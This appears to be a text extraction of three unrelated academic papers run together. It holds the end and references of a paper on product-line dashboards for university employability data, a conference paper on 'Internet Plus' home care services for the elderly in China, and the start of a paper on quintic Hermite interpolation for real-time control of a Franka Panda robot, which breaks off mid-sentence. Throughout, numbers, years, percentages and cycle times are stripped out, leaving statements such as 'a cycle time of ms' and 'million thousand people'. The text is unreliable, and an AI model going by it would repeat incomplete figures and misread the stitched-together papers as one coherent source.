product features. the presented approach was applied within the spanish observatory for vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. university employability and employment system, to provide a variety of dashboard configurations that enable the exploitation and exploration of different dimensions regarding employability and employment data. future research lines will involve refinements of the meta-model and the dsl, usability testing of the obtained products and a/b testing (cruz-benito et al., a; cruz- benito et al., b; kakas, ; siroker & koomen, ) on different configurations. architectural customization could be supported to add more coarse-grained features like a visualization recommendation engine (gotz & wen, ; vartak et al., ; voigt et al., ), interface language translation or data preprocessing techniques before its presentation. finally, the customization levels of the dashboards’ visual design and data sources need to be further addressed. additional information and declarations funding this work was supported in part by the spanish government ministry of economy and competitiveness throughout the defines project (ref. tin - -r), in part by the providedh project, funded within the chist-era programme under the national grant agreement: pcin- - (mineco, spain) and in part by la caixa foundation. the work of a vázquez-ingelmo was supported by the spanish ministry of education and vocational training under an fpu fellowship (fpu / ). there was no additional external funding received for this study. the funders helped with the contextualization of the research. grant disclosures the following grant information was disclosed by the authors: spanish government ministry of economy and competitiveness: ref. tin - -r. chist-era programme: pcin- - . la caixa foundation. spanish ministry of education and vocational training: fpu / . competing interests the authors declare there are no competing interests. author contributions • andrea vázquez-ingelmo conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. • francisco j. garcía-peñalvo and roberto therón conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/- materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: data and assets are available at https://github.com/andvazquez/dashboard-spl-assets. (doi: . /zenodo. ). references albright sc, winston w, zappe c. . data analysis and decision making. mason: cengage learning. almakky h, sahandi r, taylor j. . the effect of culture on user interface design of social media—a case study on preferences of saudi arabians on the arabic user interface of facebook. world academy of science, engineering technology international journal of social, behavioral, educational, economic, business industrial engineering : – doi . /zenodo. . Álvarez jm, evans a, sammut p. . mapping between levels in the metamodel architecture. in: international conference on the unified modeling language. berlin, heidelberg: springer, – doi . / - - - _ . apel s, kastner c, lengauer c. . featurehouse: language-independent, automated software composition. in: proceedings of the st international conference on software engineering. washington, d.c.: ieee computer society, – . apel s, kästner c, lengauer c. . language-independent and automated software composition: the featurehouse experience. ieee transactions on software engineer- ing : – doi . /tse. . . apel s, lengauer c. . superimposition: a language-independent approach to software composition. in: international conference on software composition. berlin, heidelberg: springer, – doi . / - - - - _ . bray t, paoli j, sperberg-mcqueen cm, maler e, yergeau f. . extensible markup language (xml). world wide web journal : – . card m. . readings in information visualization: using vision to think. san francisco: morgan kaufmann. chadha d, toner j. . focusing in on employability: using content analysis to explore the employability discourse in uk and usa universities. international journal of educational technology in higher education : doi . /s - - - . clark s. . render your first network configuration template using python and jinja . available at https://blogs.cisco.com/developer/network-configuration-template. clements p, northrop l. . software product lines. boston: addison-wesley. cruz-benito j, sánchez-prieto jc, vázquez-ingelmo a, therón r, garcía-peñalvo fj, martín-gonzález m. a. how different versions of layout and complexity of web forms affect users after they start it? a pilot experience. in: rocha Á, adeli h, reis lp, costanzo s, eds. trends and advances in information systems and technologies. cham: springer, – doi . / - - - - _ . cruz-benito j, vázquez-ingelmo a, sánchez-prieto jc, therón r, garcía-peñalvo fj, martín-gonzález m. b. enabling adaptability in web forms based on user vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/andvazquez/dashboard-spl-assets http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . / - - - _ http://dx.doi.org/ . /tse. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /s - - - https://blogs.cisco.com/developer/network-configuration-template http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. characteristics detection through a/b testing and machine learning. ieee access : – doi . /access. . . el-sharkawy s, yamagishi-eichler n, schmid k. . metrics for analyzing variability and its implementation in software product lines: a systematic literature review. information software technology : – doi . /se - . elias m, bezerianos a. . exploration views: understanding dashboard creation and customization for visualization novices. in: ifip conference on human-computer inter- action. berlin, heidelberg: springer, – doi . / - - - - _ . ezzat labib awad a. . enforcing customization in e-learning systems: an ontology and product line-based approach. phd thesis, universitat politécnica de valéncia. facebook. . graphql. available at https://facebook.github.io/graphql/ (accessed on july ). fallside dc, walmsley p. . xml schema part : primer second version. cambridge: w c. few s. . information dashboard design. sebastopol: o’reilly media. freeman g, batory d, lavender g. . lifting transformational models of product lines: a case study. in: international conference on theory and practice of model trans- formations. berlin, heidelberg: springer, – doi . / - - - - _ . gabillon y, biri n, otjacques b. . designing an adaptive user interface according to software product line engineering. in: the eighth international conference on advances in computer-human interactions. lisbon, portugal, – . gacek c, anastasopoules m. . implementing product line variabilities. in: acm sigsoft software engineering notes. new york: acm, – . garcía-peñalvo fj. . the third mission. in: education in the knowledge society. vol. . salamanca: universidad de salamanca, – . garcía-peñalvo fj, cruz-benito j, martín-gonzález m, vázquez-ingelmo a, sánchez- prieto jc, therón r. . proposing a machine learning approach to analyze and predict employment and its factors. international journal of interactive multimedia and artificial intelligence ( ): – doi . /ijimai. . . . gomaa h. . designing software product lines with uml: from use cases to pattern- based software architectures. boston: addison wesley longman publishing co., inc. gómez a, penadés mc, canós jh, borges mr, llavador m. . a framework for variable content document generation with multiple actors. information and software technology : – doi . /j.infsof. . . . gotz d, wen z. . behavior-driven visualization recommendation. in: proceedings of the th international conference on intelligent user interfaces. new york: acm, – . hall ma. . correlation-based feature selection for machine learning. phd thesis, university of waikato, hamilton, new zealand. hauptmann b, bauer b, harhurin a, pleuss a. . supporting derivation and customization of user interfaces in software product lines using the example of web applications. master’s thesis, technische universität münchen. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /access. . http://dx.doi.org/ . /se - http://dx.doi.org/ . / - - - - _ https://facebook.github.io/graphql/ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /ijimai. . . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /peerj-cs. hillage j, pollard e. . employability: developing a framework for policy analysis. london: dfee london. jarzabek s, bassett p, zhang h, zhang w. . xvcl: xml-based variant config- uration language. in: proceedings of the th international conference on software engineering. washington, d.c.: ieee computer society, – . kakas ac. . a/b testing. in: sammut c, webb gi, eds. encyclopedia of machine learning and data mining. new york: springer. kang kc, cohen sg, hess ja, novak we, peterson as. . feature-oriented domain analysis (foda) feasibility study. pittsburgh: carnegie-mellon university, software engineering institute. kästner c, apel s. . integrating compositional and annotative approaches for product line engineering. in: proc gpce workshop on modularization, composition and generative techniques for product line engineering. – . kästner c, apel s, kuhlemann m. . granularity in software product lines. in: proceedings of the th international conference on software engineering. new york: acm, – . kleppe ag, warmer j, bast w. . mda explained. the model driven architecture: practice and promise. boston: addison-wesley longman publishing co. inc. kramer d, oussena s, komisarczuk p, clark t. . using document-oriented guis in dynamic software product lines. in: acm sigplan notices. new york: acm, – . logre i, mosser s, collet p, riveill m. . sensor data visualisation: a composition- based approach to support domain variability. in: european conference on modelling foundations and applications. berlin, heidelberg: springer, – . marcus a, gould ew. . crosscurrents: cultural dimensions and global web user- interface design. interactions : – doi . / . . marinho fg, lima f, ferreira filho jb, rocha l, maia me, de aguiar sb, dantas vl, viana w, andrade rm, teixeira e. . a software product line for the mobile and context-aware applications domain. in: international conference on software product lines. berlin, heidelberg: springer, – . michavila f, martínez jm, martín-gonzález m, garcía-peñalvo fj, cruz-benito j. . barómetro de empleabilidad y empleo de los universitarios en españa, (primer informe de resultados). madrid: observatorio de empleabilidad y empleo universitarios. michavila f, martínez jm, martín-gonzález m, garcía-peñalvo fj, cruz benito j. a. empleabilidad de los titulados universitarios en españa. proyecto oeeu. education in the knowledge society : – doi . /eks . michavila f, martínez jm, martín-gonzález m, garcía-peñalvo fj, cruz-benito j, vázquez-ingelmo a. b. barómetro de empleabilidad y empleo universitarios. edición máster . madrid, españa: observatorio de empleabilidad y empleo universitarios. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /eks http://dx.doi.org/ . /peerj-cs. nascimento lmd. . cores assets development in software product lines-towards a practical approach for the mobile game domain. riga, latvia: lambert academic publishing. pleuss a, botterweck g, dhungana d. . integrating automated product derivation and individual user interface design. in: fourth international workshop on variability modelling of software-intensive systems. linz, austria. pleuss a, hauptmann b, dhungana d, botterweck g. a. user interface engineering for software product lines: the dilemma between automation and usability. in: proceedings of the th acm sigchi symposium on engineering interactive computing systems. new york: acm, – . pleuss a, hauptmann b, keunecke m, botterweck g. b. a case study on variability in user interfaces. in: proceedings of the th international software product line conference-vol. . new york: acm, – . pohl k, böckle g, van der linden fj. . software product line engineering: founda- tions, principles and techniques. new york: springer-verlag new york, inc. quinton c, mosser s, parra c, duchien l. . using multiple feature models to design applications for mobile phones. in: proceedings of the th international software product line conference, vol. . new york: acm, . ridge b, gaspar t, ude a. . rapid state machine assembly for modular robot control using meta-scripting, templating and code generation. in: humanoid robotics (humanoids), ieee-ras th international conference. piscataway: ieee, – . ronacher a. . jinja documentation. available at http://jinja.pocoo.org/docs/ . /: jinja . sarikaya a, correll m, bartram l, tory m, fisher d. . what do we talk about when we talk about dashboards? ieee transactions on visualization computer graphics : – . sboui t, ayed mb, alimi am. . a ui-dspl approach for the development of context-adaptable user interfaces. ieee access : – doi . /access. . . siroker d, koomen p. . a/b testing: the most powerful way to turn clicks into customers. hoboken: john wiley & sons. tufte e, graves-morris p. . the visual display of quantitative information.; . cheshire: graphics press. universities uk, confederation of british industry. . future fit: preparing graduates for the world of work. london: cbi, universities uk. vartak m, huang s, siddiqui t, madden s, parameswaran a. . towards visualiza- tion recommendation systems. acm sigmod record : – . vázquez-ingelmo a. . code repository that supports the research presented in the paper taking advantage of the software product line paradigm to generate customized user interfaces for decision-making processes: a case study on university employability. available at https://github.com/andvazquez/dashboard-spl-assets. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://jinja.pocoo.org/docs/ . /:jinja http://jinja.pocoo.org/docs/ . /:jinja http://dx.doi.org/ . /access. . https://github.com/andvazquez/dashboard-spl-assets http://dx.doi.org/ . /peerj-cs. vázquez-ingelmo a, cruz-benito j, garcía-peñalvo fj. . improving the oeeu’s data-driven technological ecosystem’s interoperability with graphql. in: dodero jm, ibarra sáiz ms, ruiz rube i, eds. fifth international conference on technological ecosystems for enhancing multiculturality (teem’ ) (cádiz, spain, october – ( ). new york: acm. vázquez-ingelmo a, garcía-peñalvo fj, therón r. a. application of domain engineering to generate customized information dashboards. in: hci international th conference on human-computer interaction ( - ). las vegas: springer. vázquez-ingelmo a, garcía-peñalvo fj, therón r. b. domain engineering for generating dashboards to analyze employment and employability in the academic context. in: th international conference on technological ecosystems for enhancing multiculturality. salamanca, spain. new york: acm doi . / . . vázquez-ingelmo a, garcía-peñalvo fj, therón r. c. generation of customized dashboards through software product line paradigms to analyse university employ- ment and employability data. in: learning analytics summer institute spain — lasi-spain . león, spain. voelter m, visser e. . product line engineering using domain-specific languages. in: software product line conference (splc), th international. piscataway: ieee, – . voigt m, pietschmann s, grammel l, meißner k. . context-aware recommen- dation of visualization components. in: the fourth international conference on information, process, and knowledge management (eknow). citeseer, – . yorke m. . employability in higher education: what it is-what it is not. heslington, york: higher education academy york. zhang h, jarzabek s, swe sm. . xvcl approach to separating concerns in product family assets. in: international symposium on generative and component-based software engineering. efurt, germany: springer, – . vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. international conference on sensor network and computer engineering (icsnce ) research on information service of home care in internet plus era jie zhao xi’an peihua university xi’an, , china e-mail: @qq.com abstract—in the “internet plus” era, information technology will be applied to the community home-based care services is a new initiative to create wisdom of the pension industry. with the full use of the internet and large data, the new model of home care for the elderly needs the active participation of the social organizations (enterprises), and the correct guidance of the government. strengthening the top-level design of government, establishing the information standard and enhancing the applicability of platform will undoubtedly speed up the informatization construction of home care platform and promote the development of our pension system. keywords-home care internet plus information i. introduction in recent years, with the rapid development of china's economy, the problem of population aging is becoming more and more serious. according to the bulletin of “social service development released by the ministry of civil affairs in ”, as the end of , there are million thousand people with aged of and more, over accounted for . % of the total population in china. among them, million thousand of the population aged and over accounted for . % of the total population. since s, our country attaches great importance to the aging problem is increasingly enhanced.in december promulgated the "social pension service system construction plan ( - ) clearly pointed out: the construction of the social old-age service system should be home-based, community-based, institutional support, the state council promulgated. in february , , “ th five-year” national aging development and pension system is constructed as follow, home-based, community-based, institutional as supplement, medical support combined old-age service system. however, according to the survey data from the national aging office, it is found that the demand rate of urban home care services in china is only . %. the most prominent problem in home care services is insufficient supply, and the contradiction between supply and demand is outstanding. on march , premier li keqiang first proposed the “internet plus” action plan in the government work report.in april at the same year, the national development and reform commission, the ministry of civil affairs, commission and other departments in the “notice” on further improving the development of pension services related work.the “internet plus pension service” is a new course. in july of the same year, the state council issued the “internet plus "action guidance” clearly put forward to accelerate the development of home network information services, and promote the healthy development of the pension industry “wisdom” to promote the healthy development of the pension industry wisdom, support intelligent health product innovation and application, promote the comprehensive quantitative healthy new ways of life. accordingly, based on the existing internet resources and social forces, based on the community building endowment information service network platform, to provide nursing care, health management, rehabilitation care in a series of “internet plus” mode of home care information construction began throughout the trial, which has gradually become an effective approach to solving the shortage, home care service supply in the supply and demand contradiction of this fundamental problem. leveraging “internet plus”, to the mobile internet terminal for the media, international conference on sensor network and computer engineering (icsnce ) community-based information service platform for community elderly, providing targeted services, to meet the various needs of different aged, thus constructing home-based care services information platform, providing information and convenient service for the elderly community, both can break the traditional pension service time and space constraints, thus extending the traditional pension service scope, also can bring market and social resources to actively participate in the construction of the system of social services, and from the problem of insufficient resources for pension services. ii. home-based care services informatization construction home care service is a kind of service form that the society provides for the old people living at home to solve the daily life difficulties. it has been playing an increasingly important role in the pension service as the foundation of our social pension service system. it is an important measure to solve the problem of pension in china. however, due to the asymmetric information of service supply, a part of the elderly does not know the home care service and do not know the content of home care services, so it is necessary to build information platform for home care services. the information technology of home care service refers to the integration process of the new generation of information technology based on the mobile internet, internet of things, cloud computing, big data and other internet technologies in the field of home care services. “internet plus community home-based care services” as a new industry is still in the initial stage, in , to promote wide application of the internet, networking and other information technology in the field of community service and pension services, the ministry of civil affairs to determine the first pension service and community service information huimin pilot project units and areas, involving provinces and autonomous region. many of them have been built on the information platform for the old-age service. at present, shanghai, suzhou, lanzhou, qinhuangdao, tianjin, xiamen city has made some useful exploration, have started the home-based care services information platform construction, the establishment of a community home-based care services information platform. there are several pension mode in different city, such as ningbo's mutual aid pension services, the wisdom of xiamen pension, or shanghai city comprehensive service platform for the old in china. home-based care services has made some achievements and accumulated some experience, the typical practice of some of the city's analysis as follows in table . from the "internet plus" home care services in the practice case of china can be seen through the pension information platform to carry out home-based care services to solve the supply and demand information asymmetry, single service and service quality, has great advantages in the field of home-based care services. a. keep up with the development of the times and improve the efficiency of community home care service with the popularity of intelligent terminals in people's daily life, more and more people are used to exchanging and trading on the information platform. in the era of big data, all kinds of information can be effectively integrated in the database, providing great convenience for people's production and life. the construction of community home care information platform is a new mode that is close to people's lifestyle. it can effectively collect all kinds of information and sort out, greatly improving the efficiency of home care services. b. the advantage of buying public service is obvious the government purchase of public services is the community old-age home in the road, the government as a direct provider of services, to address the needs of the elderly home care service part through the purchase of the service, not only can reduce the burden of government staff, also solves the problem of the administration of human resources is not enough, not professional service team, to maximize the integration of community resources, solve the problem of limited government resources. "internet plus" home-based care services with the pension information service platform construction can effectively solve the existing community endowment service level of a single, poor professional, poor service quality problems. international conference on sensor network and computer engineering (icsnce ) table i. home-care social pension system in different city project name main service character ningbo jiangdong district "home integration" pension . construct a database (database) line ( service hotline) a machine (old machine) system (home integration information system) "information service model; . the virtual network and the entity network are mutual and mutual promotion to realize the integration of information network and service function. . the construction of the information system is comprehensive and the resources are used reasonably. . the information of the service for the aged and the service for the aged are interconnected, and the resources are effectively used. xiamen wisdom pension . pension information platform has set up a public service center for the aged. . opened the " " service special for the aged, and provided the hotline service for hours. . platform has developed smart watches, fall alarm, smart mattress and other intelligent devices, which can monitor the elderly's health in real time and alarm in time, providing good support for emergency rescue. . "platform" + "hotline" to build a three-dimensional old-age service information system. . the combination of online information and offline services to form a new model for the elderly. . use intelligent equipment to monitor the elderly in real time and provide effective emergency rescue for the elderly. health room in guangxi . government led, enterprises to host building healthy huts; . to establish the information database for the elderly and the dynamic electronic health files for the elderly, and provide the services of health management, living care and mental care. . build an information, intelligent call service and support center to establish a perfect health care system for the elderly. . "government + enterprise" operates the old-age information system to reduce the burden of the government's pension investment. . the use of information database for the elderly provides accurate information for the service of the aged. shanghai is an old service platform . (www.shweilao.cn shanghai integrated service platform for old age). it has three functions of "unified portal for old information service", "unified entrance of old age service industry management" and "old database of service resources". . integrate and link all kinds of old service information to facilitate the public browsing and inquiring the content and service information of the industry. . use the information system to implement dynamic management for the old service institutions and personnel, and strengthen the service and supervision of the industry. . comprehensive services for the old service platform to achieve a powerful, "one key service"; . the elderly are combined with management and supervision to achieve multiple services in management. qinhuangdao endowment service website . strengthen the construction of information, establish a public web site for the old-age service industry and the service website of each community pension center. . the page design and language of the web site are concise and clear and clear at a glance. . the information is released in time to facilitate the users to understand the service information quickly. . the web design is concise and convenient for the communit residents and the elderly to look up. international conference on sensor network and computer engineering (icsnce ) c. taking the needs of the elderly as the guidance to effectively meet the elderly's needs for the aged only with the needs of the elderly, can the participation rate of community residents be improved and the effective demand of community home care for the elderly can be met. because of the diversity, dynamicity and variability of the needs of the elderly, the demand for services varies from different health status, income level and so on. with home care information platform, the elderly can choose their own services on the platform to meet the personalized needs of the elderly, and also solve the current plan of home care services. iii. problems in “internet plus” home-based care services although the "internet plus" home-based care services in the community home endowment service has played an important role, but there are also some problems. a. lack of industry standards and effective supervision standard construction of our country at present the information in the community home-based care services is still lagging behind, the country has not yet formed a "internet plus" community home-based care services and the corresponding management norms and service standards, quality standards are not yet on the wisdom of the pension service industry entry and exit, intelligent community home care services, pension services and intelligent system to provide services organization evaluation explicit specification. it is precisely because of lack of industry standards that further leading to government supervision is not in place. it has not yet been scientifically evaluated objectively for the information platform itself and the organization providing pension services. b. over reliance on the government, the low degree of marketization at present, though the government tries to alleviate the problem of effective supply of pension services by buying services, entrusting business and public-private partnerships, the effect is not obvious, and the contradiction between supply and demand is still outstanding. although the existing pension information platform alleviates these contradictions to a certain extent, the phenomenon of relying on the government is still obvious because the current home care is still dominated by the government. in addition, under the background of the government led, market organization's participation in community home care services is not very active, resulting in inefficient use of the information platform, and the effectiveness has not yet been effectively implemented. c. incompatibility of pension information platform at present, the information platform of community home care service mainly adopts government departments as the center to issue government information, even though some platforms extend to the communities where the elderly live, but it is still difficult to achieve the downward shift of management focus. moreover, the information platform developed by each intelligent pension enterprise is not compatible with each other, and does not connect with the government's pension service information network platform. the information can not be shared, which affects the construction of the public information platform for the old-age service. iv. improve the countermeasures of home-based care services of the internet plus " a. strengthen the design of the top level of the government, to promote the cooperation of the departments and to establish the standard system of information standards the government plays an important role in the development of social service for the aged, as well as the planners, policymakers and supervisors. in the construction of "internet plus" community home-based care services system, the government should still play a key role. first, from the policy level to improve the relevant legislation, to provide policy support for the "internet plus" home-based care services. second, we should set up a unified standard system for the elderly service information as soon as possible, and speed up the research and formulation of the information standard of the old age service according to the actual needs, the formulation of standards, the sharing of information, the international conference on sensor network and computer engineering (icsnce ) sharing of resources, and the interactive use of information platforms. b. guide social organizations and companies to participate in the information construction of community home care service “internet plus” home-based care services is home-based care services activities carried out under the guidance of the government. it needs the active participation of social organizations and market forces, so that we can solve various problems faced by the elderly at home, and meet the needs of the elderly in the diversified pension system. to this end, the government should take government procurement, government enterprise cooperation and other ways to guide the social organizations and companies to participate in the construction of the service platform for the aged. at the same time, the introduction of preferential measures in taxation, land, construction, encourage and support social forces to invest in "internet plus" home-based care services platform. c. the applicability of improvement internet plus "old-age home information platform from the building “internet plus” home care information platform's efficiency, mainly is the basic information data of the elderly registration, collection and input, so as to establish the elderly database, the elderly mainly by phone or smart devices on the platform subscription service. this is just the initial stage of home care information, to obtain the considerable development, the construction must pay attention to the applicability of the platform, the integration of social resources, the life care services, health care and psychological comfort services connected through the network, the realization of “one button”, improve the quality of home-based care services. v. conclusions facing the pressure of population aging and the decline of family care function, it is no doubt that the cooperation between the government and the third party to provide pension services is a great measure to solve the pension problem. "internet plus" the use of information technology, the government, social organizations (enterprises), the elderly link, extension of home-based care services in time and space, help to promote the full coverage of social endowment service, solve the menace from the rear of the elderly. reference [ ] wang yong. intelligent pension service "decompression" -- an interview with the national office on aging inspector, hualing intelligent endowment industry development center director zhu yong [eb/ol].http://www.lepp.zju.edu.cn/show.aspx id= &cid= . - - .? [ ] smart community health house is officially stationed in guangxi guangxi.[eb/ol]. news network http://www.gxnews.com.cn/staticpages/ /newgx cd - .shtml. - - .. [ ] zhu xiaozhuo. study on pension service model [j]. aging scientific research integration in jiangdong district of ningbo city hospital, ( ): - . [ ] li yuhui to create a new pattern of internet plus community home endowment "[j]. china civil affairs, ( ): . [ ] li zhenglong, wang hong. shanghai's accelerated development to the old service system research [m]: shanghai jiao tong university press, . [ ] liu he, cheng si. "internet plus" under the background of informationization construction countermeasure research in qinhuangdao city community endowment [j]. china high tech zone, ( ): , . [ ] li changyuan. "internet plus" in the application of community home endowment service problems and countermeasures in the [j]. journal of beijing university of posts and telecommunications (social science edition), ( ): - . [ ] yuan xiaoliang. "practical reflection internet plus" wisdom pension -- based on the research of x z platform [j]. analysis of social work and management, ( ): - . submitted july accepted september published november corresponding author morten lind, morten.lind@sintef.no academic editor marcin woźniak additional information and declarations can be found on page doi . /peerj-cs. copyright lind distributed under creative commons cc-by . open access real-time quintic hermite interpolation for robot trajectory execution morten lind production technology, sintef manufacturing, trondheim, trøndelag, norway abstract this paper presents a real-time joint trajectory interpolation system for the purpose of frequency scaling the low cycle time of a robot controller, allowing a python application to real-time control the robot at a moderate cycle time. interpolation is based on quintic hermite piece-wise splines. the splines are calculated in real-time, in a piecewise manner between the high-level, long cycle time trajectory points, while sampling of these splines at an appropriate, shorter cycle time for the real-time requirement of the lower-level system. the principle is usable in general, and the specific implementation presented is for control of the panda robot from franka emika. tracking delay analysis is presented based on a cosine trajectory. a simple test application has been implemented, demonstrating real-time feeding of a pre-calculated trajectory for cutting with a knife. estimated forces on the robot wrist are recorded during cutting and presented in the paper. subjects real-time and embedded systems, robotics keywords interpolation, robotics, real-time, python, joint control, trajectory introduction reacting instantaneously to perceived changes in the environment is an important feature of modern robotics, recently for safe human-robot cooperation, but also more traditionally for force-based control and visual servoing applications. the setup for this includes a sensor system for perceiving the environment, a control model for deciding how to react, and a control interface to the mechanical system. this must all be real-time integrated into a sensor-based robot control application. a real-time interface to the robot arm, through the robot controller, is a necessity. newer robot controllers are getting increasingly open towards real-time trajectory feeding. an early example of a supported mechanism was realized in the kuka controllers with the robot sensor interface (rsi) software package, which used a cycle time of ms in version and ms in version ; version maintained the legacy ms cycle time as an option. results were presented by lind, schrimpf & ulleberg ( ). the universal robots controllers can be controlled in various, official ways through the standard controller process. methods and results are reported by andersen ( ). older versions of the universal robots controllers provided an unofficial c api, with very low tracking delay, as presented by lind, schrimpf & ulleberg ( ). more accurate methods for measuring and classifying types of delays was presented by andersen et al. ( ). how to cite this article lind m. . real-time quintic hermite interpolation for robot trajectory execution. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:morten.lind@sintef.no https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. besides standard interfaces to robot controllers, some controllers can be hacked for gaining access at the lower controller levels. kröger & wahl ( ) directly accessed the frequency inverters of a stäubli rx controller and was able to perform servo-level control in khz. schrimpf ( ) injected a single-board computer in the usb-link between the higher and lower level controller components in a nachi ax controller, enabling joint-level control in hz. developing sensor-based, real-time robot control applications is challenging. more so when the target programming platforms, in general, are exclusively available in compiled languages such as c++. for those situations where the real-time performance is not too critical, also called soft real-time requirements, it will increase the development efficiency, if a higher level, general programming language, such as python, can work as the target platform. the main motivation for the presented work is to enable such a high level, general, soft real-time programming platform, in this case python, for developing advanced control application; such as the deepmpc framework for cutting of food products described by lenz, knepper & saxena ( ) and the real-time grasping control described by morrison, leitner & corke ( ). from experiments and experience, a pure python-based framework, exploiting numpy for numerical calculations, manages to calculate kinematics for a typical industrial robot system with six to nine joints in ms, with room for also doing some sensor processing and general data accounting, using a contemporary pc (lind, tingelstad & schrimpf, ). this calculation time strongly depends on the amount for sensor processing and data accounting, and on the computing power on the cpu and computer system on which the software is deployed. on a modern, high-end pc of today the results presented by lind, tingelstad & schrimpf ( ) may well be possible with a ms cycle time. due to the ‘‘global interpreter lock’’ in the python interpreter, multi-threading in a single python process is not utilizing the multiple cores of modern cpus, and computationally heavy applications should be distributed over several processes. eggen & eggen ( ) presents experiments and results aimed at determining when it is advantageous to process-distribute a python application. schrimpf, lind & mathisen ( ) presented a time analysis for various data paths in a distributed, real-time, sensor-based robot application implemented and deployed with python and ros. the seven-axis panda robot from franka emika can be controlled in real-time through an ethernet udp connection. the real-time control interface requires a cycle time of ms. several other robot controllers provide real-time interfaces for trajectory feeding at rates higher than hz. mihelj et al. ( ) mentions official and research interfaces for real-time control through available controllers for kuka, stäubli, yaskawa motoman, and comau robots. these examples may indicate a slow but general tendency for such joint-level, low-latency interfaces to become of more general availability among robot controllers in the future. the cycle time requirement of ms of the franka controller, and even the ms interface to newer kuka controllers with rsi version , poses a computational and real-time challenge for python-based real-time trajectory feeding application. it is a computation time challenge, since pure python computations in general is slower than c++ code by an lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. order of magnitude or more. this, however, is mitigated somewhat when using efficient scientific computation packages such as numpy and scipy. it is a real-time challenge, since the wake-up latency on the pc gets an additional contribution through the python interpreter. this paper shortly sketches a prototype solution addressing these challenges by presenting a joint-level intermediary motion service over ethernet that respects the ms real-time obligation towards the franka controller, while providing an interface to the python motion application requiring a more moderate cycle time; e.g., ms. the motion service requires a cyclic real-time response from the motion application while obeying the similar requirement from the franka controller. this allows for the motion application to make instantaneous changes and correction to the generated trajectory it emits. a positive side effect of this motion service is that it is re-connectable, since it detects the disconnection from, or a failure to comply in, the python application, whereby it takes over the real-time obligation towards the franka controller; and thus the low-level control loop is maintained. the implementation of the presented solution is based on piece-wise quintic hermite splines with an option to limit velocity, acceleration and jerk. the current implementation was developed for being fed a position trajectory from the motion application. however, velocities and accelerations are derived over the position trajectory and used in the interpolation, and can also be fed from the motion application. the presented solution can be classified as type v in the scheme by kröger & wahl ( ). the choice of piece-wise hermite spline as the fundamental computational object for trajectory representation was made due to its adequate parameterization and domain: piece-wise hermite splines are parameterized by clamping the direct motion quantities, such as position, velocity, acceleration, and jerk, at the end-points of each segment. system and methods the minimal system that have been set up for experimentation and testing is based on the seven-axis panda robot from franka emika (https://franka.de/). an intermediate motion service is performing the interpolation from a lower frequency loop to the required rate of the high frequency loop for positions, and optionally velocities and accelerations, for all joints. a motion application may then connect to the low-frequency interface of this motion service, and thus control the robot arm in a moderate real-time frequency. this section gives an overview of the active entities in the experiment system and the hermite spline calculus. the panda robot and the franka controller at the lowest level the robot arm servos are controlled via a proprietary interface by the ‘‘franka controller’’ (fc). the ‘‘franka control interface’’ (https://frankaemika.github. io/docs/libfranka.html) (fci) is a software addon for the fc which enables real-time trajectory feeding, synchronized with reading the state of the robot; including joint torques and estimated external forces. lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://franka.de/ https://frankaemika.github.io/docs/libfranka.html https://frankaemika.github.io/docs/libfranka.html http://dx.doi.org/ . /peerj-cs. figure interaction and sequence diagrams for the proposed system. (a) rough structure of processes and entities with their connections. [image credit: morten lind, ]. (b) sequence diagram for the syn- chronization among the three threads in ms, the fa and the ma. image credit: morten lind, . full-size doi: . /peerjcs. /fig- when the fci is installed on the fc, the freely available c++ library ‘‘libfranka’’(https: //github.com/frankaemika/libfranka) can be used to operate the robot arm at a cycle time of ms. the mechanism is to hand a callback function to libfranka when starting the control loop. this callback is then invoked every ms with the status of the robot arm, expecting to be returned within less than one cycle. this cycle time is dubbed the micro cycle time. in figure a fc is modelled as a process controlling the panda arm, running on the franka controller pc, i.e., it is born with its own node. the fci is exposed over an ethernet udp socket, on an ip address configured in the fc. thus the trajectory feeding is performed from a different node; e.g., a user-supplied pc. libfranka provides various methods of control, ranging from operation (cartesian) space control of the tool flange to joint torque control. this paper does not go into detail with libfranka and the presented work only uses the joint position control mode. lind ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/frankaemika/libfranka https://github.com/frankaemika/libfranka http://dx.doi.org/ . /peerj-cs. motion service and application for the purpose of obeying the micro cycle real-time requirement the ‘‘motion service’’ (ms) has been developed and implemented. as illustrated in fig. a, ms links with libfranka for setting up the callback communicating with the fc over fci, and starting the control loop. the ms is running in its own process, on its own node, separate from the fc. the ‘‘motion application’’ (ma) process may run on the same computational node as ms. for connection responsiveness, it is better to have the ms and the ma run on the same node. however, for dedicating more computing power to the ma, leaving more computational resources for sensor analysis and control algorithms, it could be running on a dedicated node. the presented architecture, where the ms is exposing its interface via an ethernet udp socket, is flexible in this regard. figure a illustrates 